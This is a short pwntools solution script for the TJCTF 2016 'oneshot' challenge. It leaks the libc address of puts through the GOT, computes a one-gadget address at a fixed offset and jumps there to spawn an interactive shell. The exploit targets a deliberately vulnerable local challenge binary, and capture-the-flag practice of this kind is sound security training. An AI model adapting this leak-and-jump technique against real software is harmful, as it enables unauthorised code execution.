TJCTF 2016 oneshot

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

from pwn import *   r = process("./oneshot") elf = ELF("./oneshot")   puts_got = elf.got['puts']   r.recv() payload = str(puts_got) r.sendline(payload)   r.recvuntil("Value: ") libc_puts = r.recvuntil("\x0a").replace("\x0a", "") libc_puts = int(libc_puts, 16) oneshot = libc_puts - 0x2a47a log.info("libc_puts = {}".format(hex(libc_puts))) log.info("oneshot = {}".format(hex(oneshot)))   r.recvuntil("Jump location?") r.sendline(str(oneshot))   r.interactive()